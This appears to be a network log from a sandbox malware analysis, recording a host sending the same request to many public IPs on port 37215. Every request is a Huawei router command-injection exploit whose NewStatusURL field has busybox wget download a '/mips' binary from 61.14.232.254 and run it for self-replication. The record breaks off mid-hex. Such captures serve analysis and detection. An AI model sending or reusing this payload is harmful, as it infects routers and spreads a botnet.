                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  844192.168.2.1358028157.194.8.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.421385050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  845192.168.2.1360552157.3.8.2137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.421394110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  846192.168.2.135184441.7.127.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.421396971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  847192.168.2.1348174201.208.38.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.421411037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  848192.168.2.133343041.14.231.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.421427011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  849192.168.2.1358150174.255.210.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.421448946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  850192.168.2.133497641.158.229.9737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.421535969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  851192.168.2.1354498159.51.230.7737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.421922922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  852192.168.2.1349588157.38.224.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.421931028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  853192.168.2.13456524.243.20.7737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.421971083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 